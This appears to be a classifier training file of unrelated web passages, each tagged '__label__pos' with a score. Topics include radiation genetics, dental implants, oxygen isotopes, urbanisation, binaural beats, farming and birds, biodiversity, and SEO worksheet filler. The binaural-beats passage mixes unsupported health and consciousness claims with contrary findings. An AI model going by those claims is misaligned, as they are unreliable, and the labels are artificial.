As a result of nuclear weapons testing in the northern Marshall Islands in the middle of the twentieth century, thousands of Marshallese were exposed to ionizing radiation and numerous islands were contaminated as a result of radioactive fallout. Increased cancer incidence and metabolic syndrome have been reported in residents of the Republic of the Marshall Islands, and many more radiation-induced cancers are expected to emerge due to the latency of cancer
development. In this study, we will investigate the genetic and epigenetic effects of exposure to ionizing radiation that are associated with cancer and metabolic syndrome development among the Marshallese population in Northwest Arkansas. : Specific Aims Specific Aim 1. Determine whether exposures to IR are associated with stable chromosomal aberrations in peripheral lymphocytes of NWA Marshallese.
Using innovative and sensitive methodology (multiple fluorescence in situ hybridization [mFISH]), we will analyze and compare chromosomal aberrations in lymphocytes from NWA Marshallese and from matched control subjects. This will allow us to identify persistent cytogenetic aberrations associated with the exposure to IR, and the proposed method will provide much greater resolution than conventional cytogenetic techniques.
Specific Aim 2. Determine whether exposures to IR are associated with altered levels of LINE-1 DNA methylation in peripheral lymphocytes of NWA Marshallese. Using new methodology developed in our laboratory, we will examine and compare the DNA methylation status of 12 LINE-1 elements that belong to different evolutionary lineages. Results from samples of NWA Marshallese will be compared to those from
samples of matched controls. Our new method allows robust analysis of LINE-1 DNA methylation from as few as 500 cells of starting material, as well as sensitive identification of alterations in DNA methylation, even within subsets of LINE-1 elements.
|
__label__pos
| 0.855065
|
In some ways, tooth loss is natural. For instance, if you ignore a dental disease, then the consequences of it will naturally lead to the loss of your teeth. However, it isn’t natural in the same sense as aging. Unlike growing older, you can largely prevent tooth loss from occurring with proper care and maintenance, and by addressing dental health concerns promptly. At our El Paso, TX, dental office, we not only help you prevent tooth loss, but also help you prevent further concerns if tooth loss occurs by designing a custom, highly lifelike tooth replacement.
Your other teeth try to take up the slack
Losing a tooth means that rank and file of your teeth loses a supporting member. The teeth closest to the gap can feel the pressure every time you bite and chew, and can shift toward the space in an effort to compensate for it. This can lead to a host of issues, including forced tooth misalignment, structurally weaker teeth, a higher risk of tooth decay, and ultimately, an increased risk of losing more teeth. To avoid this, we can fill the gap in your smile with a lifelike dental bridge, or with a dental implant-supported crown that replaces your lost tooth root, as well.
Your risks of further tooth loss increase
Shifting teeth aren’t the only thing that can increase your risks of further tooth loss. For instance, losing a tooth root means losing stimulation in your jawbone, which can result in diminished minerals and nutrients flowing to it. Over time, your jawbone may shrink as it loses mass and density, making it weaker and less able to fully support your remaining teeth. The only way to prevent this is to reestablish that stimulation with an appropriate number of dental implants. The implant posts mimic your healthy teeth roots by supporting your custom crown, bridge, or denture, as well as helping your jawbone maintain its flow of nutrients.
Your oral and facial structures can suffer
As your jawbone shrinks from lack of stimulation, it will eventually become visibly apparent in your facial appearance. The jaw, cheekbones, and surrounding oral and facial structures can begin to sag due to inadequate support, a condition commonly referred to as facial collapse. By replacing your lost teeth with dental implants, you not only preserve your jawbone, but also the aforementioned structures to help you preserve your smile’s and face’s youthful appearance.
Don’t ignore tooth loss any longer
Avoid the more serious consequences of tooth loss by restoring your smile with a lifelike replacement as soon as possible. To learn more, schedule a consultation by
calling the Sunny Smiles dental office nearest you in El Paso, TX, today! We also have offices in Chaparral, Canutillo, and Vinton so we can easily serve patients throughout all surrounding communities.
|
__label__pos
| 0.939566
|
It refers to the shock waves perpendicular to the flow direction. The area of the shockwave relies on the variety in the cross-sectional stream zone of the conduit, and also on the upstream and downstream limit conditions.
Show the figure of normal shock waves as below.
Get help on Mechanical Engineering with Chegg Study
Answers from experts
Send any homework question to our team of experts
Step-by-step solutions
View the step-by-step solutions for thousands of textbooks
In engineering there are many key concepts and terms that are crucial for students to know and understand. Often it can be hard to determine what the most important engineering concepts and terms are, and even once you’ve identified them you still need to understand what they mean. To help you learn and understand key engineering terms and concepts, we’ve identified some of the most important ones and provided detailed definitions for them, written and compiled by Chegg experts.
|
__label__pos
| 0.703399
|
Summary The ’material turn’ in critical theory - and particularly the turn towards the body coupled with scientific insights from biomedicine, biology and physics - is becoming an important path in fields of humanities-based scholarly inquiry. Material and technological philosophies play an increasingly central role in disciplines such as literary studies, cultural studies, history, performance and aesthetics, to name only a few. This edited collection of essays investigates how the material turn finds applications within humanities-based frameworks - focusing on practical reflections and disciplinary responses. It takes as its critical premise the understanding that importation of theoretical viewpoints is never straightforward; rather, a complex, sometimes even fraught, communication takes place between these disciplines at the imperceptible lines where praxis and theory meet, transforming both the landscape of practical engagement and the models of material theory. Presenting a multi- and interdisciplinary consideration of current research on the cultural relationship to living (and non-living) bodies, Corporeality and Culture: Bodies in Movement puts the body in focus. From performance and body modification to film, literature and other cultural technologies, this volume undertakes a significant speculative mapping of the current possibilities for engagement, transformation and variance of embodied movement in relation to scientifically-situated corporealities and materialities in cultural and artistic practices. Time and time again, it finds these ever-shifting modes of being to be inextricably interdependent and coextensive: movement requires embodiment; and embodiment is a form of movement.
Reviews ’For well over a decade the turn to the body has complicated any straightforward conception of social construction or biologism. The essays collected in Corporeality and Culture transform the fields of gender studies and cultural studies in surprising and astute ways. Focused on important ethical and political questions these essays will be highly valuable and fascinating reading for anyone interested in contemporary culture and the difficulties of thinking about the politics of embodiment.’ Claire Colebrook, Penn State University, USA ’Corporeality and Culture is a next-generation volume in feminist theory and queer studies. The editors write how they have modestly witnessed the making of new materialisms in academia and art, and readers will find themselves in the position of the modest witness to a new twist in the turn towards post-humanist and affect theory, phenomenology and Deleuze Studies. The individual essays survey contemporary corporeality across theory and a multitude of artistic practices.’ Iris van der Tuin, Utrecht University, The Netherlands ’Here a new generation of scholars address the motion, e-motion and sheer commotion of bodies in states of becoming and relation. Resisting any conception of the body� as unity or totality, this collection constructs new cartographies emphasising difference, mutability, porosity and the undecidably in-between. This is adventurous, exploratory, experimental work, refusing to be bound to programs of any kind; this is thinking on the move towards unanticipated possibilities and unpredictable outcomes.’ Anna Gibbs, University of Western Sydney, Australia
|
__label__pos
| 0.655279
|
In the study, the researchers investigated how looking at nutrition labels affected the dietary intakes of over 1,000 university students. The participants were asked to answer whether they usually read nutrition labels on packaged foods. With their answers, they were classified as label-users or non-users. Their adherence to the Mediterranean diet was also evaluated using the relative Mediterranean Diet Score (rMED), in which positive scores are attributed to fruits, vegetables, legumes, fish, olive oil, and cereals. On the other hand, negative scores are attributed to meat and dairy products. Then, the total rMED scores were classified into three groups: Designating low, medium, and high adherence.
“Our approach contributes to exploring the role of nutritional labels use as a suitable tool to make healthier food choices from a different wider perspective based on dietary patterns such as Mediterranean Diet (MD), which can also indicate an overall healthy lifestyle,” said lead researcher Professor Manuela García-de-la-Hera.
Results of the study revealed that 58 percent of the population used nutrition labels. Label-users had a closer adherence to a Mediterranean-type of diet than non-users. In addition, label-users were also found to eat higher amounts of fruits, vegetables, and fish, and consumed less meat compared to non-users of labels.
In a sub-analysis, 738 of the participants were asked about their reasons for reading or not reading nutrition labels. Those who read labels reported that they did so mainly out of health concerns (e.g., adherence to a healthy diet, weight loss, or weight management). Conversely, those who admitted to not reading labels said they did not have enough time or were simply not interested.
“Our data are far from being able to establish a possible causal link between nutrition label use and higher adherence to MD, but they constitute a suitable rationale for replicating in other samples. Therefore, additional large-scale longitudinal studies are necessary to corroborate our findings and explore other aspects not covered in this study, such as nutritional knowledge, consumer preferences, or participant skills,” the researchers said.
Things you need to know about reading and understanding nutrition labels
Reading the nutritional information on the back of a packaged food may not be easy. Moreover, some people do not have the time to check the labels. Furthermore, brands use clever and misleading ways to convince buyers to buy their products. (Related: Nutrition labels confuse food shoppers; calls for simpler labels intensify.)
Here are three things you need to look for when reading a food label:
Check the ingredient list– Ingredients on nutrition labels should be listed in descending order according to weight. Thus, if the first three ingredients include sugar or highly processed ingredients, you would not want to buy that product. Watch out for hidden sugars– Manufacturers can use different sugars with names that you would not recognize. In addition to “sugar” words, look for other terms such as invert sugar, dextrose, maltol, fructose, sucrose, syrup, and maltodextrin. Keep an eye on buzzwords– Manufacturers can trick you into thinking that their products are healthy with their labels. Some of the buzz words they use include sugar-free, gluten-free, low-carb, low-fat, low-calorie, organic, natural, light, and fruit-flavored. They use other ingredients and chemicals to produce a similar flavor. For example, “sugar-free” products may use artificial sweeteners as an alternative, which are more harmful in reality. Therefore, check the nutrition label carefully.
Read more news stories and studies on ingredients by going to
Ingredients.news. Sources include:
|
__label__pos
| 0.709606
|
Oxygen has contributed to our understanding of the evolution of life on Earth by providing invaluable clues to geological processes — yet it still holds the key to some unsolved mysteries, as
Mark H. Thiemens explains.
Long before oxygen bars made it cool, element number 8 was somewhat magical. In the nucleus, there exist levels that when filled provide additional nuclear stability beyond that expected from normal binding-energy considerations, much like the filled shells of the noble gases for electrons. These nuclear 'magic numbers' occur at proton or neutron numbers of 2, 8, 20, 28, 50, 82 and 126. Consequently, oxygen's most common isotope (
16O 8), with its eight protons and eight neutrons, is 'doubly magic'. This accounts for its abundance — it is the third most abundant element in the universe after hydrogen and helium.
During nucleosynthesis, in which protons and neutrons organize to form atom nuclei in stars, three
4He nuclei combine to form 12C — a two–step process, with two 4He nuclei forming 8Be that in turn fuses with the third 4He. 12C is subsequently converted into 16O by further fusion with another helium nucleus.
Positioned at group 16 and period 2 in the periodic table, oxygen is an unusually reactive non-metallic atom that forms compounds with nearly all other elements. Its cosmic abundance combined with its chemical properties lead to its participation in a range of processes that build or protect planets (as part of silicate material or through the allotrope ozone, respectively) construct living organisms (in DNA, proteins, lipids and carbohydrates), as well as serving metabolic roles (photosynthesis and respiration). It is ubiquitous in the Earth's crust, mantle, atmosphere and surface water, and biological reservoirs that are connected through oxygen transfer. Carbon dioxide — a dominant greenhouse gas — is a major agent of the transfer between these reservoirs.
Since its original discovery by Carl Wilhelm Scheele in Uppsala in 1773, and publication by Joseph Priestley two years later, oxygen has had a long and interesting history. Lavoisier played a major role in the identification of the process by which oxidation or combustion occurs — and provided oxygen with its name, borrowing Greek roots (
oxys and -genes) to refer to it as 'creator of acids' because he thought all acids contained oxygen. Oxygen's role throughout the history of civilization is extensive, from energy production (whether hydrological or as a general fuel oxidant) to agriculture and as a component of textiles and ceramics, as well as many drugs.
Going back further in time, oxygen is intimately associated with the origin and evolution of life. In the Precambrian era, atmospheric oxygen levels were significantly lower than now, probably less than 0.1% of the current ones — although it is still difficult to quantify this with precision. Using multi-isotope measurements of sulfur
1 these low oxygen levels were estimated to have occurred between about 3.8 and 2.7 billion years ago. Only a little later — 2.2–2.5 billion years ago — the 'Great Oxygenation Event' 2 occurred and oxygen levels abruptly rose, largely owing to activities of cyanobacteria producing noticeable changes in the redox state and distribution of oxygen in minerals, such as the globally pervasive banded iron formations.
Measurements of oxygen isotopes (
16O, 17O and 18O) have been crucial in resolving natural processes. Stemming from work in the Urey laboratory in the 1950s 3,4 analyses of oceanic biological carbonates have been used to quantify the temperature change of the oceans over geological timescales. Similarly, the role of marine and terrestrial organisms in global photosynthesis, respiration and their change over time was deduced from measurements of atmospheric oxygen — which depend on the difference in the 18O to 16O ratio between air and water (the Dole effect).
Since 1973, we have known that the oldest objects in the solar system — the calcium- and aluminium-rich inclusions of 'carbonaceous chondritic' meteorites — possess a multiple oxygen isotope distribution that is inconsistent with conventional isotope effects
5. Experiments a decade later suggested that this might be because of processes such as photochemical isotope self-shielding, or chemical reactions that depend on symmetry factors rather than the conventional mass effect, which can produce a similar anomalous isotopic distribution 6. Recently, however, measurements of solar wind samples collected 7 by the spacecraft Genesis — which may reflect the dominant reservoir of oxygen in the solar system — have shown that their isotopic distribution is not similar to that of meteorites.
This means that the oxygen isotopic distribution of the Sun may potentially not reflect the original distribution of the isotopic reservoir of meteorites and stony planets. Consequently, the nebular source of that original distribution, and how these celestial bodies went on to produce the current meteorites and planets, remain unresolved.
References About this article Publication history Published DOI Further reading The Astrophysical Journal(2012)
|
__label__pos
| 0.984801
|
African urbanisation: An analytic policy guide
Africa is rapidly urbanising: it is the most important structural transformation underway in the region. By 2050, almost regardless of government policies, its urban population will have tripled. But the consequences are critically dependent upon policy choices: successful urbanisation requires active and far-sighted government. At its best, urbanisation can be the essential motor of economic development, rapidly lifting societies out of mass poverty. At its worst, it results in concentrations of squalor and disaffection which ferment political fragility.
To date, African urbanisation has been dysfunctional, the key indication being that cities have not generated enough productive jobs. If urban policies remain unchanged, future urbanisation is likely to result in similar outcomes. This paper sets out how changed policies can unlock the potential of urbanisation for prosperity. Primarily, it sets out the economic forces underlying this potential, and the specific policy actions they require. But policy actions do not just happen: they are generated by political processes that confer authority and capacity on public institutions. The paper concludes with a discussion of how politically urban policy-making might be improved.
|
__label__pos
| 0.987781
|
Theta brainwaves occur most often in sleep but are also dominant in deep meditation. Theta is our gateway to learning, memory, and intuition. In theta, our senses are withdrawn from the external world and focused on signals originating from within. It is that twilight state which we normally only experience fleetingly as we wake or drift off to sleep. In theta we are in a dream; vivid imagery, intuition and information beyond our normal conscious awareness. It’s where we hold our ‘stuff’, our fears, troubled history, and nightmares.
Going deeper into a trance-like state of meditation, you enter the mysterious Theta state where brain activity slows almost to the point of sleep, but not quite. Theta is one of the more elusive and extraordinary realms you can explore. It is also known as the twilight state which you normally only experience fleetingly upon waking, or drifting off to sleep.
The gentle pulsating rhythms of Brain Sync audio programs act in a similar fashion, yet because the frequencies are precise and consistent they can be targeted to induce highly specific and desired brain states. Just as you can tune a radio to get a particular station, with Brain Sync technology you can re-tune your consciousness – effectively dialing your mind into a wide variety of brain states. I have read something different about theta waves and learning languages. A University of Washington study tested students resting brainwave activity before learning French. They found that students with a higher amount beta/gamma and a lower amount of delta/theta activity were better at acquiring a second language. When you are dominant in theta, that is the lowest and most deeply relaxed awakened state you can be in. I think it would be much harder to really concentrate, fully understand and learn new information while in a theta state, so I would personally consider using theta while studying. James Austin, a neurologist, began practicing Zen meditation during a visit to Japan. After years of practice, he found himself having to re-evaluate what his professional background had taught him. "It was decided for me by the experiences I had while meditating," said Austin, author of the book "Zen and the Brain" and now a philosophy scholar at the University of Idaho. "Some of them were quickenings, one was a major internal absorption an intense hyper-awareness, empty endless space that was blacker than black and soundless and vacant of any sense of my physical bodily self. I felt deep bliss. I realized that nothing in my training or experience had prepared me to help me understand what was going on in my brain. It was a wake-up call for a neurologist." Some studies have found that binaural beats can affect cognitive function positively or negatively, depending on the specific frequency that’s generated. For example, a study of long-term memory found that beta-frequency binaural beats improved memory, while theta-frequency binaural beats interfered with memory. This is something for scientists to continue to examine closely. For people who use binaural beats, it’s important to understand that different frequencies will produce different effects.
Brain wave entrainment is a real phenomenon and is useful as one method of investigating how the brain works. But there is no evidence, nor any theoretical basis, for any long lasting effect on brain function or that there is any benefit of any kind. Despite this, there is a huge industry of devices that claim to train your brain waves and have a beneficial effect. I wouldn’t waste a dime on any such device.
Infra-Low brainwaves (also known as Slow Cortical Potentials), are thought to be the basic cortical rythms that underlie our higher brain functions. Very little is known about infra-low brainwaves. Their slow nature make them difficult to detect and accurately measure, so few studies have been done. They appear to take a major role in brain timing and network function. Brainwave entrainment is a colloquialism for such 'neural entrainment', which is a term used to denote the way in which the aggregate frequency of oscillations produced by the synchronous electrical activity in ensembles of cortical neurons can adjust to synchronize with the periodic vibration of an external stimuli, such as a sustained acoustic frequency perceived as pitch, a regularly repeating pattern of intermittent sounds, perceived as rhythm, or of a regularly rhythmically intermittent flashing light. At the heart of the critique of the new brain research is what one theologian at St. Louis University called the "nothing-butism" of some scientists the notion that all phenomena could be understood by reducing them to basic units that could be measured. And finally, say believers, if God existed and created the universe, wouldn't it make sense that he would install machinery in our brains that would make it possible to have mystical experiences? "Neuroscientists are taking the viewpoints of physicists of the last century that everything is matter," said Mathew, the Duke psychiatrist. "I am open to the possibility that there is more to this than what meets the eye. I don't believe in the omnipotence of science or that we have a foolproof explanation."
it says the following: “Running a delta sleep session throughout the night is not recommended as it can interrupt the normal sleep cycle”. I’ve been looping pure delta isochronic tones for about 5 days now, and have had quality sleep. Should I continue looping delta or should I let the videos play out without looping them? Will it will harm my health to do loop delta while I sleep?
Research done under Gerald Oster suggested that binaural beats may be used as a medical tool, especially for diagnosing neurological conditions. In particular, he noticed that untreated sufferers of Parkinson’s disease were unable to “hear” binaual beats but further research indicated successful treatment when the subject was finally able to perceive them at the end of a Parkinson’s treatment regimen. Oster also noted difference in perception in women based on their menstrual cycle, and posited that there may be some connection between the ability to perceive binaural beats and the woman’s levels of estrogen at the time.
I first became aware of brainwave meditation programs and brain waves when researching alternative methods for treating the bipolar disorder I had been unsuccessfully living with my entire adult life. I eventually learned a method of releasing difficult emotions on the spot, which I then practiced extensively, and consequently found it easier and even desirable to meditate for fairly lengthy periods of time. Though I took up meditation as a serious daily practice and experienced many undeniable benefits, I nonetheless intermittently experienced life-debilitating bouts of mania and severe depression, often resulting in chaotic mixed states and an inability to maintain daily social functions. During these times, it became nearly impossible to sit in meditation.
Binaural beats are auditory brainstem responses which originate in the superior olivary nucleus of each hemisphere. They result from the interaction of two different auditory impulses, originating in opposite ears, below 1000 Hz and which differ in frequency between one and 30 Hz (Oster, 1973).For example, if a pure tone of 400 Hz is presented to the right ear and a pure tone of 410 Hz is presented simultaneously to the left ear, an amplitude modulated standing wave of 10 Hz, the difference between the two tones, is experienced as the two wave forms mesh in and out of phase within the superior olivary nuclei. This binaural beat is not heard in the ordinary sense of the word (the human range of hearing is from 20-20,000 Hz). It is perceived as an auditory beat and theoretically can be used to entrain specific neural rhythms through the frequency-following response (FFR)--the tendency for cortical potentials to entrain to or resonate at the frequency of an external stimulus. Thus, it is theoretically possible to utilize a specific binaural-beat frequency as a consciousness management technique to entrain a specific cortical rhythm. If you name your emotions, you can tame them, according to new research that suggests why meditation works. Brain scans show that putting negative emotions into words calms the brain's emotion center. That could explain meditationÕs purported emotional benefits, because people who meditate often label their negative emotions in an effort to let them go. I call the kind of intuitions and inspirations that come when we meditate and do these kinds of practices my “marching orders.”Okay, this is what I need to do. We’re not using our brilliant linear minds here; that’s not the place wisdom comes from. The place of wisdom is, again, relaxing into these states with loving-kindness, and then all the stuff can come out, whether we are dealing with our shadow issues or dealing with our light issues—the wisdom and gifts we haven’t yet brought forth that need to be birthed. If mind-consciousness is not the brain, why then does science relate states of consciousness and mental functioning to Brainwave frequencies? And how is it that audio with embedded binaural beats alters brain waves? The first question can be answered in terms of instrumentation. There is no objective way to measure mind or consciousness with an instrument. Mind-consciousness appears to be a field phenomenon which interfaces with the body and the neurological structures of the brain (Hunt, 1995). One cannot measure this field directly with current instrumentation. On the other hand, the electrical potentials of brain waves can be measured and easily quantified. Contemporary science likes things that can be measured and quantified. The problem here lies in oversimplification of the observations. EEG patterns measured on the cortex are the result of electro-neurological activity of the brain. But the brain's electro-neurological activity is not mind-consciousness. EEG measurements then are only an indirect means of assessing the mind-consciousness interface with the neurological structures of the brain. As crude as this may seem, the EEG has been a reliable way for researchers to estimate states of consciousness based on the relative proportions of EEG frequencies. Stated another way, certain EEG patterns have been historically associated with specific states of consciousness. It is reasonable to assume, given the current EEG literature, that if a specific EEG pattern emerges it is probably accompanied by a particular state of consciousness. One can also learn to control and slow down their brain waves through various neurofeedback technologies such as electroencephalograph (EEG), galvanic skin response (GSR), and heart, pulse and breath rate monitors. These devices measure stress and relaxation parameters and then "play" back the signals to the user so they can use the signals as a beacon to guide and "steer" themselves into a relaxed state. This takes some time, work and discipline but is much quicker than learning meditation. I appreciate your compliment on my article Henry. I’ve been using and reading up on isochronic tones and brainwave entrainment for many years, so it was just a case of trying to put a lot of what I’ve learnt into one article. I don’t have a great deal of knowledge or experience in using hypnosis and subliminals, so I’m afraid I wouldn’t be in a position to create something so extensive in reviewing them.
This kind of conflicting evidence regarding the effectiveness of binaural beats to produce valid and reliable changes in brain waves abounds in the literature. For example, Rosenfeld, Reinhart, & Srivastava, (1997) found that in a sample of normal college students, alpha and beta audiovisual stimulation showed evidence of brainwave entrainment, but baseline levels of alpha and beta among the participants affected the observed degree of entrainment, producing significant individual differences in response. López-Caballero & Escera (2017) found that administration of binaural beats in the various frequency bands produced no changes in EEG spectral power between the time periods of baseline and those periods with beats presented. Likewise, Wahbeh, Calabrese, Zwickey, & Zajdel (2007) found no effect on brainwaves with the administration of alpha frequency binaural beats. It is easy, however, to find personal testimonials online.
Brain research is beginning to produce concrete evidence for something that Buddhist practitioners of meditation have maintained for centuries: Mental discipline and meditative practice can change the workings of the brain and allow people to achieve different levels of awareness. Those transformed states have traditionally been understood in transcendent terms, as something outside the world of physical measurement and objective evaluation.
As the ancient cultures believed that sound waves of different frequency and beats could induce a state of meditation. Ancient Hindus and Yogis believed that specific kind of sound waves can induce relaxing effects. I found the best binaurial beat app BINAURAL BEATS - MEDITATION & RELAXATION - Apps on Google Play as it is designed to provide you with the best meditation, deep sleep, stress relief, healing and sleep sounds. “Binaural beats are not very noticeable because the modulation depth (the difference between loud and quiet) is 3 db, a two-to-one ratio. (Isochronic tones and mono beats easily have 50 db difference between loud and quiet, which is a 100,00-to-1 ratio). This means that binaural beats are unlikely to produce an significant entrainment because they don’t activate the thalamus.” A common element in recordings incorporating alpha and theta frequencies is a steady but barely perceptible rhythm of the frequencies themselves. This subtle and calming pulse mixes with sounds of gentle breezes, distant bird songs, and the slow progression of deep synth notes. Underneath this, below the audible sounds at sub 16 hertz levels, other frequencies intermingle, deepening the merging of conscious and unconscious mind.
|
__label__pos
| 0.839272
|
Conservation Column: Done Right, Farming Can Benefit Both Humans and Birds
Birds help farmers. They control pests, sow seeds, pollinate flowers, and fertilize soils. Unfortunately, the reverse is not true; common agricultural practices do not help birds. Often they have led to devastating bird population declines. The North American Breeding Bird Survey data shows that 74 percent of farmland-associated species decreased between 1966 and 2013. The size of the global human population is large and growing, with a concomitant increase in the numbers of mouths to feed. That means that large swaths of natural habitat are destroyed to make way for agriculture. The remaining patches of native habitat are small and isolated. In addition, the chemicals used to increase crop yields are either interfering with reproduction in birds or killing them outright. Luckily, bird-friendly farming practices do exist.
Growing and buying organic food reduces risks from the many toxins used in conventional farming. Not only do some of these pesticides harm the birds directly (pesticides such as neonicotinoids cause loss of body mass, neurological impairment, and reproductive failure), but they also decimate the insect food base of many birds. Ironically, the loss of birds and beneficial insects, in turn, increases the surplus of crop pests. Low-intensity farming, which utilizes less pesticides and allows for more natural habitat, provides many other benefits, such as soil conservation, improved water quality, and carbon storage.
Several scientific reports have detailed the benefits of planting and maintaining wildflower strips, hedgerows, and other areas of native vegetation on farms. Even though a small area is taken out of crop production, the practice can actually increase crop yield. Plantings support pollinators such as native bees, beneficial insects, and birds. Native bees and some birds improve productivity through their pollination services. Beneficial insects and birds control crop pests. In one recent study, farm-edge habitat that contained native plants supported nearly three times as many bird species as those without, and importantly, reduced the abundance of the most significant insect pests by over 33 percent. Another study noted that planting wildflower strips adjacent to a crop field led to a 40 percent reduction in crop damage due to beetles and other pests.
Protecting riparian or streamside areas, as well as wetlands located on farms, also supports greater biodiversity. Rice farmers in California used to burn the straw residue post harvest. Now they flood their fields, creating temporary wetlands that support migratory and residential birds. It’s another win-win situation. The presence of the birds increases the rate of straw decomposition and creates better planting conditions for the next season.
A 2019 long-term study in Costa Rica measured population declines in 69 out of 112 bird species. On the positive side, coffee plantations that had modest tree cover hosted more types of birds. Farms with an average of about 13 percent tree cover hosted double the number of forest specialist birds compared with plantations with an average of 7 percent tree cover. Other studies have revealed the merits of agroforestry, or shade-grown crops, such as coffee and cocoa. One found 1,216 species of birds using agroforests compared to 303 species using conventional farms. Several surveys of agroforests have documented greater species richness and abundance of individuals, as well as reduced soil erosion, increased carbon sequestration, improved pollination, better pest control, and better connectivity for the many animals that live in forests.
Other sustainable practices include smart water and soil management (such as no-till farming), and moving away from planting mono-crop fields. Many programs, including the US Conservation Reserve Program, will pay landowners to convert highly erodible cropland into wildlife habitat, but the program is underfunded and limited. Stronger government policies in the United States and across the globe are needed to promote more environmentally friendly agricultural practices. Farming can be for the birds as well as the people!
|
__label__pos
| 0.98724
|
Biodiversity : Biodiversity How did biological diversity come about?
What are the principles of natural selection?
What affects biodiversity? What is biological diversity? : What is biological diversity? 1. genetic diversity
2. species diversity
3. higher taxonomic diversity (taxonomy)
4. habitat diversity How many species exist in the world? : How many species exist in the world? No one knows!
Taxonomists have named and described 1.4-1.7 million species
56% insects
14% plants
3% vertebrates
15% are in oceans
Highly biased sample
Vertebrates much more widely studied
What about microbes?
4000 different bacteria species per gram of Norwegian soil!
Also, mostly done in Europe and N. America while most of the biodiversity is in tropical countries and in oceans bacteria So how many species are there? : So how many species are there? 0 5,000,000 10,000,000 15,000,000 number of species total identified total estimated to exist however, this number could be as high as 100,000,000 14 mil 1.7 mil Global biodiversity seems to be at its peak Where are these species? : Where are these species? Oceans
1 to 10 million in oceans
diverse in phyla
32 in oceans but only 12 phyla on land
Tropics
7% of land mass
50% of species Slide 6: How do species evolve? Evolution is the change in the genetic characteristics of a population over time.
This change may happen by:
genetic mutations
natural selection
geographic isolation and migration
genetic drift (most likely in small, isolated populations) Slide 7: Views of Species Change: Evolution Lamarck (1809)
Use and disuse
Inheritance of acquired characteristics
Charles Darwin (1859)
Alfred Wallace Organisms today descended by gradual changes from ancient ancestors.
Age of the Earth: 238Uranium half-life of 4.5 billion years, current amount present suggests earth is ~ 4.6 billion years old (…so what?) Slide 8: Principles of Natural Selection Genetic variation exists among organisms in a population, these variations are inheritable.
Populations produce more offspring than environment can support and therefore only a fraction survive (struggle for existence)
Individuals best adapted to environment (more “fit”) will survive and leave more offspring
…..“Survival of the fittest” Examples of natural selection : Examples of natural selection Moths: “industrial melanism”
DDT and mosquitos What is “fit” changes with a changing environment Galapagos finches : Galapagos finches Variety of finches filling many ecological niches
Ground feeders, flower and fruit feeders, insectivores, woodpecker finch, warbler finch
Evolutionary divergence in < 3 million years Island speciation in Galapagos finches : Island speciation in Galapagos finches Some islands have only one species
No competition for seeds
beak sizes have a larger range of variation
“Generalists” Other islands have > 1 species
Competition for seeds
Leads to character displacement to reduce competition
“Specialists” Character displacement and biodiversity : Character displacement and biodiversity Helps explain how so many species are able to coexist
Competitive exclusion principle: Two species that have exactly the same requirements (niches) cannot coexist in the same habitat.
However, species that require the same resources can coexist by utilizing those resources under different environmental conditions (or niches)
Also called “resource partitioning” or “niche partitioning” Slide 13: Speciation Speciation = origin of new species
Central phenomenon of evolution
Evolution ≠ speciation
When is a subpopulation defined as a new species?
How do genes usually flow through a population?
Reproductive isolation prevents gene flow and allows 2 populations to become distinct. Slide 14: Geographic isolation and migration If two populations are geographically isolated from each other for a long time, they may change so much that they cannot reproduce Genetic drift : Genetic drift Changes in the frequency of a gene in a population due to chance (not mutation, natural selection, or migration).
Mostly an issue in small populations (endangered species)
Genetic variability is low in small populations, so their ability to adapt to future changes in the environment is low. Where can expect to find high biodiversity or low biodiversity? : Where can expect to find high biodiversity or low biodiversity? Higher diversity in complex environments : Higher diversity in complex environments Larger number of niches in heterogeneous environments
Also, high diversity at a supporting trophic level leads to high diversity. Slide 18: “Paradox of the Plankton” seemingly simple environment, many species, no competitive exclusion
environmental complexity can still account for significant portion of diversity
need just two limiting resources Slide 20: Environments can be complex when spatial component added Slide 21: Highest diversity at intermediate disturbance levels Intermediate Disturbance Hypothesis
low disturbance, competitors dominate
high disturbance, only a few stress-tolerators Slide 22: Highest Diversity in Low Nutrient Environments What leads to low diversity? : What leads to low diversity? Environmental stress, extreme environments, extreme disturbance, or limitation of an essential resource
Geographic isolation (real or ecological islands)
Recent introductions of exotic species
|
__label__pos
| 0.964592
|
Every learner has different abilities, backgrounds, and life experiences. Some individuals will be entering a trades program directly from high school as part of a dual-credit program or youth initiative and have limited experience outside of the classroom. Others may have been out ofthe formal education system for a number of years, but bring valuable years of work experience into the classroom. Regardless of where you are starting from, integral to your success in postsecondary education is developing effective study and learning skills. Time spent on these learning tasks will increase the effectiveness of time spent on all other learning tasks in your training program. In addition, the techniques that you choose to adopt and the effective study routine that you develop will benefit you... Show More
|
__label__pos
| 0.796631
|
At College Situations, Limiting Reactant And Percent Yield Worksheet Answer Key ordinarily refer to a single sheet of paper with questions or workouts for students to complete also note answers. They are used, to some degree, in most subjects, also have widespread utilize in the math syllabus where there are two key types. The 1st type of math worksheet contains a collection of identical math problems or practices. These are expected to help a worker become skilled in a particular mathematical ability that was instructed to them in course. They are ussually given to students as hometask. The 2nd kind of math worksheet is intended to acquaint new subjects, or are frequently completed in the course room. They are made up of a progressive set of questions that guides to an understanding of the subject to be studied.
Worksheets are important because those are individual actions and parents also need it. They (parents) get to recognize what the child is doing in the class. With evolving curricula, parents may not have the significant education to guidance their workers thru job task or supply additional assistance at home. Possessing a worksheet template simply reachable can support with advancing studying at home.
Overall, research in early boyhood education indicates that worksheets are recommended mainly for evaluation objectives. Worksheets should not be used for teaching as this is not developmentally appropriate for the education of junior students.
As an assessment tool, worksheets can be utilized by teachers to know students’ previous knowledge, output of learning, or the process of learning; at the same time, they could be utilized to allow students to monitor the progress of their own learning.
Worksheet generators are oft utilized to develop the type of worksheets that contain a group of same issues. A worksheet generator is a application program that quickly generates a group of issues, particularly in mathematics or numeracy. Such application is oftentimes utilized by teachers to make classroom stuffs also tests. Worksheet builders may be loaded on local computers or accessed via a site. There are also many worksheet generators that are available online. However, authentic worksheets can be made on software like word or powerpoint.
Top 20 Amazing Limiting Reactant And Percent Yield Worksheet Answer Key That You Will Love It in your computer by clicking resolution image in Download by size:. Don't forget to rate and comment if you interest with this worksheet template.
|
__label__pos
| 0.88775
|
